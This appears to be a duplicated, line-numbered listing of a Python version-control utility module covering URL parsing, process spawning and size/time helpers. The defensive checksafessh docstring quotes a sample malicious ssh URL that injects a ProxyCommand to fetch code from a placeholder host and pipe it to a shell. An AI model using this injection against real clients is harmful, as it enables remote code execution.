2691 # running process on success. Instead we listen for SIGCHLD telling
2695 # running process on success. Instead we listen for SIGCHLD telling
2692 # us our child process terminated.
2696 # us our child process terminated.
2693 terminated = set()
2697 terminated = set()
2694 def handler(signum, frame):
2698 def handler(signum, frame):
2695 terminated.add(os.wait())
2699 terminated.add(os.wait())
2696 prevhandler = None
2700 prevhandler = None
2697 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2701 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2698 if SIGCHLD is not None:
2702 if SIGCHLD is not None:
2699 prevhandler = signal.signal(SIGCHLD, handler)
2703 prevhandler = signal.signal(SIGCHLD, handler)
2700 try:
2704 try:
2701 pid = spawndetached(args)
2705 pid = spawndetached(args)
2702 while not condfn():
2706 while not condfn():
2703 if ((pid in terminated or not testpid(pid))
2707 if ((pid in terminated or not testpid(pid))
2704 and not condfn()):
2708 and not condfn()):
2705 return -1
2709 return -1
2706 time.sleep(0.1)
2710 time.sleep(0.1)
2707 return pid
2711 return pid
2708 finally:
2712 finally:
2709 if prevhandler is not None:
2713 if prevhandler is not None:
2710 signal.signal(signal.SIGCHLD, prevhandler)
2714 signal.signal(signal.SIGCHLD, prevhandler)
2711
2715
2712 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2716 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2713 """Return the result of interpolating items in the mapping into string s.
2717 """Return the result of interpolating items in the mapping into string s.
2714
2718
2715 prefix is a single character string, or a two character string with
2719 prefix is a single character string, or a two character string with
2716 a backslash as the first character if the prefix needs to be escaped in
2720 a backslash as the first character if the prefix needs to be escaped in
2717 a regular expression.
2721 a regular expression.
2718
2722
2719 fn is an optional function that will be applied to the replacement text
2723 fn is an optional function that will be applied to the replacement text
2720 just before replacement.
2724 just before replacement.
2721
2725
2722 escape_prefix is an optional flag that allows using doubled prefix for
2726 escape_prefix is an optional flag that allows using doubled prefix for
2723 its escaping.
2727 its escaping.
2724 """
2728 """
2725 fn = fn or (lambda s: s)
2729 fn = fn or (lambda s: s)
2726 patterns = '|'.join(mapping.keys())
2730 patterns = '|'.join(mapping.keys())
2727 if escape_prefix:
2731 if escape_prefix:
2728 patterns += '|' + prefix
2732 patterns += '|' + prefix
2729 if len(prefix) > 1:
2733 if len(prefix) > 1:
2730 prefix_char = prefix[1:]
2734 prefix_char = prefix[1:]
2731 else:
2735 else:
2732 prefix_char = prefix
2736 prefix_char = prefix
2733 mapping[prefix_char] = prefix_char
2737 mapping[prefix_char] = prefix_char
2734 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2738 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2735 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2739 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2736
2740
2737 def getport(port):
2741 def getport(port):
2738 """Return the port for a given network service.
2742 """Return the port for a given network service.
2739
2743
2740 If port is an integer, it's returned as is. If it's a string, it's
2744 If port is an integer, it's returned as is. If it's a string, it's
2741 looked up using socket.getservbyname(). If there's no matching
2745 looked up using socket.getservbyname(). If there's no matching
2742 service, error.Abort is raised.
2746 service, error.Abort is raised.
2743 """
2747 """
2744 try:
2748 try:
2745 return int(port)
2749 return int(port)
2746 except ValueError:
2750 except ValueError:
2747 pass
2751 pass
2748
2752
2749 try:
2753 try:
2750 return socket.getservbyname(pycompat.sysstr(port))
2754 return socket.getservbyname(pycompat.sysstr(port))
2751 except socket.error:
2755 except socket.error:
2752 raise Abort(_("no port number associated with service '%s'") % port)
2756 raise Abort(_("no port number associated with service '%s'") % port)
2753
2757
2754 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2758 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2755 '0': False, 'no': False, 'false': False, 'off': False,
2759 '0': False, 'no': False, 'false': False, 'off': False,
2756 'never': False}
2760 'never': False}
2757
2761
2758 def parsebool(s):
2762 def parsebool(s):
2759 """Parse s into a boolean.
2763 """Parse s into a boolean.
2760
2764
2761 If s is not a valid boolean, returns None.
2765 If s is not a valid boolean, returns None.
2762 """
2766 """
2763 return _booleans.get(s.lower(), None)
2767 return _booleans.get(s.lower(), None)
2764
2768
2765 _hextochr = dict((a + b, chr(int(a + b, 16)))
2769 _hextochr = dict((a + b, chr(int(a + b, 16)))
2766 for a in string.hexdigits for b in string.hexdigits)
2770 for a in string.hexdigits for b in string.hexdigits)
2767
2771
2768 class url(object):
2772 class url(object):
2769 r"""Reliable URL parser.
2773 r"""Reliable URL parser.
2770
2774
2771 This parses URLs and provides attributes for the following
2775 This parses URLs and provides attributes for the following
2772 components:
2776 components:
2773
2777
2774 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2778 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2775
2779
2776 Missing components are set to None. The only exception is
2780 Missing components are set to None. The only exception is
2777 fragment, which is set to '' if present but empty.
2781 fragment, which is set to '' if present but empty.
2778
2782
2779 If parsefragment is False, fragment is included in query. If
2783 If parsefragment is False, fragment is included in query. If
2780 parsequery is False, query is included in path. If both are
2784 parsequery is False, query is included in path. If both are
2781 False, both fragment and query are included in path.
2785 False, both fragment and query are included in path.
2782
2786
2783 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2787 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2784
2788
2785 Note that for backward compatibility reasons, bundle URLs do not
2789 Note that for backward compatibility reasons, bundle URLs do not
2786 take host names. That means 'bundle://../' has a path of '../'.
2790 take host names. That means 'bundle://../' has a path of '../'.
2787
2791
2788 Examples:
2792 Examples:
2789
2793
2790 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2794 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2791 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2795 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2792 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2796 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2793 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2797 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2794 >>> url(b'file:///home/joe/repo')
2798 >>> url(b'file:///home/joe/repo')
2795 <url scheme: 'file', path: '/home/joe/repo'>
2799 <url scheme: 'file', path: '/home/joe/repo'>
2796 >>> url(b'file:///c:/temp/foo/')
2800 >>> url(b'file:///c:/temp/foo/')
2797 <url scheme: 'file', path: 'c:/temp/foo/'>
2801 <url scheme: 'file', path: 'c:/temp/foo/'>
2798 >>> url(b'bundle:foo')
2802 >>> url(b'bundle:foo')
2799 <url scheme: 'bundle', path: 'foo'>
2803 <url scheme: 'bundle', path: 'foo'>
2800 >>> url(b'bundle://../foo')
2804 >>> url(b'bundle://../foo')
2801 <url scheme: 'bundle', path: '../foo'>
2805 <url scheme: 'bundle', path: '../foo'>
2802 >>> url(br'c:\foo\bar')
2806 >>> url(br'c:\foo\bar')
2803 <url path: 'c:\\foo\\bar'>
2807 <url path: 'c:\\foo\\bar'>
2804 >>> url(br'\\blah\blah\blah')
2808 >>> url(br'\\blah\blah\blah')
2805 <url path: '\\\\blah\\blah\\blah'>
2809 <url path: '\\\\blah\\blah\\blah'>
2806 >>> url(br'\\blah\blah\blah#baz')
2810 >>> url(br'\\blah\blah\blah#baz')
2807 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2811 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2808 >>> url(br'file:///C:\users\me')
2812 >>> url(br'file:///C:\users\me')
2809 <url scheme: 'file', path: 'C:\\users\\me'>
2813 <url scheme: 'file', path: 'C:\\users\\me'>
2810
2814
2811 Authentication credentials:
2815 Authentication credentials:
2812
2816
2813 >>> url(b'ssh://joe:xyz@x/repo')
2817 >>> url(b'ssh://joe:xyz@x/repo')
2814 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2818 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2815 >>> url(b'ssh://joe@x/repo')
2819 >>> url(b'ssh://joe@x/repo')
2816 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2820 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2817
2821
2818 Query strings and fragments:
2822 Query strings and fragments:
2819
2823
2820 >>> url(b'http://host/a?b#c')
2824 >>> url(b'http://host/a?b#c')
2821 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2825 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2822 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2826 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2823 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2827 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2824
2828
2825 Empty path:
2829 Empty path:
2826
2830
2827 >>> url(b'')
2831 >>> url(b'')
2828 <url path: ''>
2832 <url path: ''>
2829 >>> url(b'#a')
2833 >>> url(b'#a')
2830 <url path: '', fragment: 'a'>
2834 <url path: '', fragment: 'a'>
2831 >>> url(b'http://host/')
2835 >>> url(b'http://host/')
2832 <url scheme: 'http', host: 'host', path: ''>
2836 <url scheme: 'http', host: 'host', path: ''>
2833 >>> url(b'http://host/#a')
2837 >>> url(b'http://host/#a')
2834 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2838 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2835
2839
2836 Only scheme:
2840 Only scheme:
2837
2841
2838 >>> url(b'http:')
2842 >>> url(b'http:')
2839 <url scheme: 'http'>
2843 <url scheme: 'http'>
2840 """
2844 """
2841
2845
2842 _safechars = "!~*'()+"
2846 _safechars = "!~*'()+"
2843 _safepchars = "/!~*'()+:\\"
2847 _safepchars = "/!~*'()+:\\"
2844 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2848 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2845
2849
2846 def __init__(self, path, parsequery=True, parsefragment=True):
2850 def __init__(self, path, parsequery=True, parsefragment=True):
2847 # We slowly chomp away at path until we have only the path left
2851 # We slowly chomp away at path until we have only the path left
2848 self.scheme = self.user = self.passwd = self.host = None
2852 self.scheme = self.user = self.passwd = self.host = None
2849 self.port = self.path = self.query = self.fragment = None
2853 self.port = self.path = self.query = self.fragment = None
2850 self._localpath = True
2854 self._localpath = True
2851 self._hostport = ''
2855 self._hostport = ''
2852 self._origpath = path
2856 self._origpath = path
2853
2857
2854 if parsefragment and '#' in path:
2858 if parsefragment and '#' in path:
2855 path, self.fragment = path.split('#', 1)
2859 path, self.fragment = path.split('#', 1)
2856
2860
2857 # special case for Windows drive letters and UNC paths
2861 # special case for Windows drive letters and UNC paths
2858 if hasdriveletter(path) or path.startswith('\\\\'):
2862 if hasdriveletter(path) or path.startswith('\\\\'):
2859 self.path = path
2863 self.path = path
2860 return
2864 return
2861
2865
2862 # For compatibility reasons, we can't handle bundle paths as
2866 # For compatibility reasons, we can't handle bundle paths as
2863 # normal URLS
2867 # normal URLS
2864 if path.startswith('bundle:'):
2868 if path.startswith('bundle:'):
2865 self.scheme = 'bundle'
2869 self.scheme = 'bundle'
2866 path = path[7:]
2870 path = path[7:]
2867 if path.startswith('//'):
2871 if path.startswith('//'):
2868 path = path[2:]
2872 path = path[2:]
2869 self.path = path
2873 self.path = path
2870 return
2874 return
2871
2875
2872 if self._matchscheme(path):
2876 if self._matchscheme(path):
2873 parts = path.split(':', 1)
2877 parts = path.split(':', 1)
2874 if parts[0]:
2878 if parts[0]:
2875 self.scheme, path = parts
2879 self.scheme, path = parts
2876 self._localpath = False
2880 self._localpath = False
2877
2881
2878 if not path:
2882 if not path:
2879 path = None
2883 path = None
2880 if self._localpath:
2884 if self._localpath:
2881 self.path = ''
2885 self.path = ''
2882 return
2886 return
2883 else:
2887 else:
2884 if self._localpath:
2888 if self._localpath:
2885 self.path = path
2889 self.path = path
2886 return
2890 return
2887
2891
2888 if parsequery and '?' in path:
2892 if parsequery and '?' in path:
2889 path, self.query = path.split('?', 1)
2893 path, self.query = path.split('?', 1)
2890 if not path:
2894 if not path:
2891 path = None
2895 path = None
2892 if not self.query:
2896 if not self.query:
2893 self.query = None
2897 self.query = None
2894
2898
2895 # // is required to specify a host/authority
2899 # // is required to specify a host/authority
2896 if path and path.startswith('//'):
2900 if path and path.startswith('//'):
2897 parts = path[2:].split('/', 1)
2901 parts = path[2:].split('/', 1)
2898 if len(parts) > 1:
2902 if len(parts) > 1:
2899 self.host, path = parts
2903 self.host, path = parts
2900 else:
2904 else:
2901 self.host = parts[0]
2905 self.host = parts[0]
2902 path = None
2906 path = None
2903 if not self.host:
2907 if not self.host:
2904 self.host = None
2908 self.host = None
2905 # path of file:///d is /d
2909 # path of file:///d is /d
2906 # path of file:///d:/ is d:/, not /d:/
2910 # path of file:///d:/ is d:/, not /d:/
2907 if path and not hasdriveletter(path):
2911 if path and not hasdriveletter(path):
2908 path = '/' + path
2912 path = '/' + path
2909
2913
2910 if self.host and '@' in self.host:
2914 if self.host and '@' in self.host:
2911 self.user, self.host = self.host.rsplit('@', 1)
2915 self.user, self.host = self.host.rsplit('@', 1)
2912 if ':' in self.user:
2916 if ':' in self.user:
2913 self.user, self.passwd = self.user.split(':', 1)
2917 self.user, self.passwd = self.user.split(':', 1)
2914 if not self.host:
2918 if not self.host:
2915 self.host = None
2919 self.host = None
2916
2920
2917 # Don't split on colons in IPv6 addresses without ports
2921 # Don't split on colons in IPv6 addresses without ports
2918 if (self.host and ':' in self.host and
2922 if (self.host and ':' in self.host and
2919 not (self.host.startswith('[') and self.host.endswith(']'))):
2923 not (self.host.startswith('[') and self.host.endswith(']'))):
2920 self._hostport = self.host
2924 self._hostport = self.host
2921 self.host, self.port = self.host.rsplit(':', 1)
2925 self.host, self.port = self.host.rsplit(':', 1)
2922 if not self.host:
2926 if not self.host:
2923 self.host = None
2927 self.host = None
2924
2928
2925 if (self.host and self.scheme == 'file' and
2929 if (self.host and self.scheme == 'file' and
2926 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2930 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2927 raise Abort(_('file:// URLs can only refer to localhost'))
2931 raise Abort(_('file:// URLs can only refer to localhost'))
2928
2932
2929 self.path = path
2933 self.path = path
2930
2934
2931 # leave the query string escaped
2935 # leave the query string escaped
2932 for a in ('user', 'passwd', 'host', 'port',
2936 for a in ('user', 'passwd', 'host', 'port',
2933 'path', 'fragment'):
2937 'path', 'fragment'):
2934 v = getattr(self, a)
2938 v = getattr(self, a)
2935 if v is not None:
2939 if v is not None:
2936 setattr(self, a, urlreq.unquote(v))
2940 setattr(self, a, urlreq.unquote(v))
2937
2941
2938 @encoding.strmethod
2942 @encoding.strmethod
2939 def __repr__(self):
2943 def __repr__(self):
2940 attrs = []
2944 attrs = []
2941 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2945 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2942 'query', 'fragment'):
2946 'query', 'fragment'):
2943 v = getattr(self, a)
2947 v = getattr(self, a)
2944 if v is not None:
2948 if v is not None:
2945 attrs.append('%s: %r' % (a, v))
2949 attrs.append('%s: %r' % (a, v))
2946 return '<url %s>' % ', '.join(attrs)
2950 return '<url %s>' % ', '.join(attrs)
2947
2951
2948 def __bytes__(self):
2952 def __bytes__(self):
2949 r"""Join the URL's components back into a URL string.
2953 r"""Join the URL's components back into a URL string.
2950
2954
2951 Examples:
2955 Examples:
2952
2956
2953 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2957 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2954 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2958 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2955 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2959 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2956 'http://user:pw@host:80/?foo=bar&baz=42'
2960 'http://user:pw@host:80/?foo=bar&baz=42'
2957 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2961 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2958 'http://user:pw@host:80/?foo=bar%3dbaz'
2962 'http://user:pw@host:80/?foo=bar%3dbaz'
2959 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2963 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2960 'ssh://user:pw@[::1]:2200//home/joe#'
2964 'ssh://user:pw@[::1]:2200//home/joe#'
2961 >>> bytes(url(b'http://localhost:80//'))
2965 >>> bytes(url(b'http://localhost:80//'))
2962 'http://localhost:80//'
2966 'http://localhost:80//'
2963 >>> bytes(url(b'http://localhost:80/'))
2967 >>> bytes(url(b'http://localhost:80/'))
2964 'http://localhost:80/'
2968 'http://localhost:80/'
2965 >>> bytes(url(b'http://localhost:80'))
2969 >>> bytes(url(b'http://localhost:80'))
2966 'http://localhost:80/'
2970 'http://localhost:80/'
2967 >>> bytes(url(b'bundle:foo'))
2971 >>> bytes(url(b'bundle:foo'))
2968 'bundle:foo'
2972 'bundle:foo'
2969 >>> bytes(url(b'bundle://../foo'))
2973 >>> bytes(url(b'bundle://../foo'))
2970 'bundle:../foo'
2974 'bundle:../foo'
2971 >>> bytes(url(b'path'))
2975 >>> bytes(url(b'path'))
2972 'path'
2976 'path'
2973 >>> bytes(url(b'file:///tmp/foo/bar'))
2977 >>> bytes(url(b'file:///tmp/foo/bar'))
2974 'file:///tmp/foo/bar'
2978 'file:///tmp/foo/bar'
2975 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2979 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2976 'file:///c:/tmp/foo/bar'
2980 'file:///c:/tmp/foo/bar'
2977 >>> print(url(br'bundle:foo\bar'))
2981 >>> print(url(br'bundle:foo\bar'))
2978 bundle:foo\bar
2982 bundle:foo\bar
2979 >>> print(url(br'file:///D:\data\hg'))
2983 >>> print(url(br'file:///D:\data\hg'))
2980 file:///D:\data\hg
2984 file:///D:\data\hg
2981 """
2985 """
2982 if self._localpath:
2986 if self._localpath:
2983 s = self.path
2987 s = self.path
2984 if self.scheme == 'bundle':
2988 if self.scheme == 'bundle':
2985 s = 'bundle:' + s
2989 s = 'bundle:' + s
2986 if self.fragment:
2990 if self.fragment:
2987 s += '#' + self.fragment
2991 s += '#' + self.fragment
2988 return s
2992 return s
2989
2993
2990 s = self.scheme + ':'
2994 s = self.scheme + ':'
2991 if self.user or self.passwd or self.host:
2995 if self.user or self.passwd or self.host:
2992 s += '//'
2996 s += '//'
2993 elif self.scheme and (not self.path or self.path.startswith('/')
2997 elif self.scheme and (not self.path or self.path.startswith('/')
2994 or hasdriveletter(self.path)):
2998 or hasdriveletter(self.path)):
2995 s += '//'
2999 s += '//'
2996 if hasdriveletter(self.path):
3000 if hasdriveletter(self.path):
2997 s += '/'
3001 s += '/'
2998 if self.user:
3002 if self.user:
2999 s += urlreq.quote(self.user, safe=self._safechars)
3003 s += urlreq.quote(self.user, safe=self._safechars)
3000 if self.passwd:
3004 if self.passwd:
3001 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3005 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3002 if self.user or self.passwd:
3006 if self.user or self.passwd:
3003 s += '@'
3007 s += '@'
3004 if self.host:
3008 if self.host:
3005 if not (self.host.startswith('[') and self.host.endswith(']')):
3009 if not (self.host.startswith('[') and self.host.endswith(']')):
3006 s += urlreq.quote(self.host)
3010 s += urlreq.quote(self.host)
3007 else:
3011 else:
3008 s += self.host
3012 s += self.host
3009 if self.port:
3013 if self.port:
3010 s += ':' + urlreq.quote(self.port)
3014 s += ':' + urlreq.quote(self.port)
3011 if self.host:
3015 if self.host:
3012 s += '/'
3016 s += '/'
3013 if self.path:
3017 if self.path:
3014 # TODO: similar to the query string, we should not unescape the
3018 # TODO: similar to the query string, we should not unescape the
3015 # path when we store it, the path might contain '%2f' = '/',
3019 # path when we store it, the path might contain '%2f' = '/',
3016 # which we should *not* escape.
3020 # which we should *not* escape.
3017 s += urlreq.quote(self.path, safe=self._safepchars)
3021 s += urlreq.quote(self.path, safe=self._safepchars)
3018 if self.query:
3022 if self.query:
3019 # we store the query in escaped form.
3023 # we store the query in escaped form.
3020 s += '?' + self.query
3024 s += '?' + self.query
3021 if self.fragment is not None:
3025 if self.fragment is not None:
3022 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3026 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3023 return s
3027 return s
3024
3028
3025 __str__ = encoding.strmethod(__bytes__)
3029 __str__ = encoding.strmethod(__bytes__)
3026
3030
3027 def authinfo(self):
3031 def authinfo(self):
3028 user, passwd = self.user, self.passwd
3032 user, passwd = self.user, self.passwd
3029 try:
3033 try:
3030 self.user, self.passwd = None, None
3034 self.user, self.passwd = None, None
3031 s = bytes(self)
3035 s = bytes(self)
3032 finally:
3036 finally:
3033 self.user, self.passwd = user, passwd
3037 self.user, self.passwd = user, passwd
3034 if not self.user:
3038 if not self.user:
3035 return (s, None)
3039 return (s, None)
3036 # authinfo[1] is passed to urllib2 password manager, and its
3040 # authinfo[1] is passed to urllib2 password manager, and its
3037 # URIs must not contain credentials. The host is passed in the
3041 # URIs must not contain credentials. The host is passed in the
3038 # URIs list because Python < 2.4.3 uses only that to search for
3042 # URIs list because Python < 2.4.3 uses only that to search for
3039 # a password.
3043 # a password.
3040 return (s, (None, (s, self.host),
3044 return (s, (None, (s, self.host),
3041 self.user, self.passwd or ''))
3045 self.user, self.passwd or ''))
3042
3046
3043 def isabs(self):
3047 def isabs(self):
3044 if self.scheme and self.scheme != 'file':
3048 if self.scheme and self.scheme != 'file':
3045 return True # remote URL
3049 return True # remote URL
3046 if hasdriveletter(self.path):
3050 if hasdriveletter(self.path):
3047 return True # absolute for our purposes - can't be joined()
3051 return True # absolute for our purposes - can't be joined()
3048 if self.path.startswith(br'\\'):
3052 if self.path.startswith(br'\\'):
3049 return True # Windows UNC path
3053 return True # Windows UNC path
3050 if self.path.startswith('/'):
3054 if self.path.startswith('/'):
3051 return True # POSIX-style
3055 return True # POSIX-style
3052 return False
3056 return False
3053
3057
3054 def localpath(self):
3058 def localpath(self):
3055 if self.scheme == 'file' or self.scheme == 'bundle':
3059 if self.scheme == 'file' or self.scheme == 'bundle':
3056 path = self.path or '/'
3060 path = self.path or '/'
3057 # For Windows, we need to promote hosts containing drive
3061 # For Windows, we need to promote hosts containing drive
3058 # letters to paths with drive letters.
3062 # letters to paths with drive letters.
3059 if hasdriveletter(self._hostport):
3063 if hasdriveletter(self._hostport):
3060 path = self._hostport + '/' + self.path
3064 path = self._hostport + '/' + self.path
3061 elif (self.host is not None and self.path
3065 elif (self.host is not None and self.path
3062 and not hasdriveletter(path)):
3066 and not hasdriveletter(path)):
3063 path = '/' + path
3067 path = '/' + path
3064 return path
3068 return path
3065 return self._origpath
3069 return self._origpath
3066
3070
3067 def islocal(self):
3071 def islocal(self):
3068 '''whether localpath will return something that posixfile can open'''
3072 '''whether localpath will return something that posixfile can open'''
3069 return (not self.scheme or self.scheme == 'file'
3073 return (not self.scheme or self.scheme == 'file'
3070 or self.scheme == 'bundle')
3074 or self.scheme == 'bundle')
3071
3075
3072 def hasscheme(path):
3076 def hasscheme(path):
3073 return bool(url(path).scheme)
3077 return bool(url(path).scheme)
3074
3078
3075 def hasdriveletter(path):
3079 def hasdriveletter(path):
3076 return path and path[1:2] == ':' and path[0:1].isalpha()
3080 return path and path[1:2] == ':' and path[0:1].isalpha()
3077
3081
3078 def urllocalpath(path):
3082 def urllocalpath(path):
3079 return url(path, parsequery=False, parsefragment=False).localpath()
3083 return url(path, parsequery=False, parsefragment=False).localpath()
3080
3084
3081 def checksafessh(path):
3085 def checksafessh(path):
3082 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3086 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3083
3087
3084 This is a sanity check for ssh urls. ssh will parse the first item as
3088 This is a sanity check for ssh urls. ssh will parse the first item as
3085 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3089 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3086 Let's prevent these potentially exploited urls entirely and warn the
3090 Let's prevent these potentially exploited urls entirely and warn the
3087 user.
3091 user.
3088
3092
3089 Raises an error.Abort when the url is unsafe.
3093 Raises an error.Abort when the url is unsafe.
3090 """
3094 """
3091 path = urlreq.unquote(path)
3095 path = urlreq.unquote(path)
3092 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3096 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3093 raise error.Abort(_('potentially unsafe url: %r') %
3097 raise error.Abort(_('potentially unsafe url: %r') %
3094 (path,))
3098 (path,))
3095
3099
3096 def hidepassword(u):
3100 def hidepassword(u):
3097 '''hide user credential in a url string'''
3101 '''hide user credential in a url string'''
3098 u = url(u)
3102 u = url(u)
3099 if u.passwd:
3103 if u.passwd:
3100 u.passwd = '***'
3104 u.passwd = '***'
3101 return bytes(u)
3105 return bytes(u)
3102
3106
3103 def removeauth(u):
3107 def removeauth(u):
3104 '''remove all authentication information from a url string'''
3108 '''remove all authentication information from a url string'''
3105 u = url(u)
3109 u = url(u)
3106 u.user = u.passwd = None
3110 u.user = u.passwd = None
3107 return str(u)
3111 return str(u)
3108
3112
3109 timecount = unitcountfn(
3113 timecount = unitcountfn(
3110 (1, 1e3, _('%.0f s')),
3114 (1, 1e3, _('%.0f s')),
3111 (100, 1, _('%.1f s')),
3115 (100, 1, _('%.1f s')),
3112 (10, 1, _('%.2f s')),
3116 (10, 1, _('%.2f s')),
3113 (1, 1, _('%.3f s')),
3117 (1, 1, _('%.3f s')),
3114 (100, 0.001, _('%.1f ms')),
3118 (100, 0.001, _('%.1f ms')),
3115 (10, 0.001, _('%.2f ms')),
3119 (10, 0.001, _('%.2f ms')),
3116 (1, 0.001, _('%.3f ms')),
3120 (1, 0.001, _('%.3f ms')),
3117 (100, 0.000001, _('%.1f us')),
3121 (100, 0.000001, _('%.1f us')),
3118 (10, 0.000001, _('%.2f us')),
3122 (10, 0.000001, _('%.2f us')),
3119 (1, 0.000001, _('%.3f us')),
3123 (1, 0.000001, _('%.3f us')),
3120 (100, 0.000000001, _('%.1f ns')),
3124 (100, 0.000000001, _('%.1f ns')),
3121 (10, 0.000000001, _('%.2f ns')),
3125 (10, 0.000000001, _('%.2f ns')),
3122 (1, 0.000000001, _('%.3f ns')),
3126 (1, 0.000000001, _('%.3f ns')),
3123 )
3127 )
3124
3128
3125 _timenesting = [0]
3129 _timenesting = [0]
3126
3130
3127 def timed(func):
3131 def timed(func):
3128 '''Report the execution time of a function call to stderr.
3132 '''Report the execution time of a function call to stderr.
3129
3133
3130 During development, use as a decorator when you need to measure
3134 During development, use as a decorator when you need to measure
3131 the cost of a function, e.g. as follows:
3135 the cost of a function, e.g. as follows:
3132
3136
3133 @util.timed
3137 @util.timed
3134 def foo(a, b, c):
3138 def foo(a, b, c):
3135 pass
3139 pass
3136 '''
3140 '''
3137
3141
3138 def wrapper(*args, **kwargs):
3142 def wrapper(*args, **kwargs):
3139 start = timer()
3143 start = timer()
3140 indent = 2
3144 indent = 2
3141 _timenesting[0] += indent
3145 _timenesting[0] += indent
3142 try:
3146 try:
3143 return func(*args, **kwargs)
3147 return func(*args, **kwargs)
3144 finally:
3148 finally:
3145 elapsed = timer() - start
3149 elapsed = timer() - start
3146 _timenesting[0] -= indent
3150 _timenesting[0] -= indent
3147 stderr.write('%s%s: %s\n' %
3151 stderr.write('%s%s: %s\n' %
3148 (' ' * _timenesting[0], func.__name__,
3152 (' ' * _timenesting[0], func.__name__,
3149 timecount(elapsed)))
3153 timecount(elapsed)))
3150 return wrapper
3154 return wrapper
3151
3155
3152 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3156 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3153 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3157 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3154
3158
3155 def sizetoint(s):
3159 def sizetoint(s):
3156 '''Convert a space specifier to a byte count.
3160 '''Convert a space specifier to a byte count.
3157
3161
3158 >>> sizetoint(b'30')
3162 >>> sizetoint(b'30')
3159 30
3163 30
3160 >>> sizetoint(b'2.2kb')
3164 >>> sizetoint(b'2.2kb')
3161 2252
3165 2252
3162 >>> sizetoint(b'6M')
3166 >>> sizetoint(b'6M')
3163 6291456
3167 6291456
3164 '''
3168 '''
3165 t = s.strip().lower()
3169 t = s.strip().lower()
3166 try:
3170 try:
3167 for k, u in _sizeunits:
3171 for k, u in _sizeunits:
3168 if t.endswith(k):
3172 if t.endswith(k):
3169 return int(float(t[:-len(k)]) * u)
3173 return int(float(t[:-len(k)]) * u)
3170 return int(t)
3174 return int(t)
3171 except ValueError:
3175 except ValueError:
3172 raise error.ParseError(_("couldn't parse size: %s") % s)
3176 raise error.ParseError(_("couldn't parse size: %s") % s)
3173
3177
3174 class hooks(object):
3178 class hooks(object):
3175 '''A collection of hook functions that can be used to extend a
3179 '''A collection of hook functions that can be used to extend a
3176 function's behavior. Hooks are called in lexicographic order,
3180 function's behavior. Hooks are called in lexicographic order,
3177 based on the names of their sources.'''
3181 based on the names of their sources.'''
3178
